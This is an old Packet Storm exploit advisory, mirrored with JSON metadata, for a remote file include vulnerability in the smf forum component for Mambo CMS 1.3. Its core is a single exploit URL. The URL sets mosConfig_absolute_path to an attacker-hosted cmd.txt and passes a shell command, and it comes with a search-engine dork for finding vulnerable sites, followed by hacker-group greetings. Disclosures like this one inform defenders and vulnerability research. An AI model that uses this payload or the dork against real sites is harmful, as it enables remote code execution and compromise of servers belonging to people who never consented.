Search...

smf.txt

2006-07-12T00:00:00

ID PACKETSTORM:48164
Type packetstorm
Reporter OLiBekaS
Modified 2006-07-12T00:00:00

Description

                                        
                                            `--------------------------------------------------------------------------------  
  
Title : smf forum for Mambo CMS &lt;= 1.3 Remote File Include Vulnerabilities  
  
###############################################################################  
  
Discovered By OLiBekaS  
  
-----------------------------------------------------------------------------  
  
Affected software description :  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application : component for Mambo CMS  
version : 1.3  
  
-----------------------------------------------------------------------------  
  
bug found in file : smf.php  
  
dork : allinurl:"com_smf"  
  
Exploit :   
  
http://[target]/[path]/components/com_smf/smf.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls   
  
------------------------------------------------------------------------------  
  
greatz:  
~~~~~  
  
# Special greetz to my master effex and bEdAh`oTaK ( thank man )  
# To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy. and other  
  
-------------------------------------------------------------------------------  
  
  
Contact:  
~~~~~~~  
  
Nick: OLiBekaS  
E-mail: olibekas[at]gmail[dot]Com  
Homepage: http://bekas.6te.net  
  
--------------------------------- [ eof ] ---------------------------------------`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:48164", "type": "packetstorm", "bulletinFamily": "exploit", "title": "smf.txt", "description": "", "published": "2006-07-12T00:00:00", "modified": "2006-07-12T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/48164/smf.txt.html", "reporter": "OLiBekaS", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:17:11", "viewCount": 2, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-03T10:17:11", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:17:11", "rev": 2}, "vulnersScore": -0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/48164/smf.txt", "sourceData": "`-------------------------------------------------------------------------------- \n \nTitle : smf forum for Mambo CMS <= 1.3 Remote File Include Vulnerabilities \n \n############################################################################### \n \nDiscovered By OLiBekaS \n \n----------------------------------------------------------------------------- \n \nAffected software description : \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nApplication : component for Mambo CMS \nversion : 1.3 \n \n----------------------------------------------------------------------------- \n \nbug found in file : smf.php \n \ndork : allinurl:\"com_smf\" \n \nExploit : \n \nhttp://[target]/[path]/components/com_smf/smf.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls \n \n------------------------------------------------------------------------------ \n \ngreatz: \n~~~~~ \n \n# Special greetz to my master effex and bEdAh`oTaK ( thank man ) \n# To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy. and other \n \n------------------------------------------------------------------------------- \n \n \nContact: \n~~~~~~~ \n \nNick: OLiBekaS \nE-mail: olibekas[at]gmail[dot]Com \nHomepage: http://bekas.6te.net \n \n--------------------------------- [ eof ] ---------------------------------------`\n"}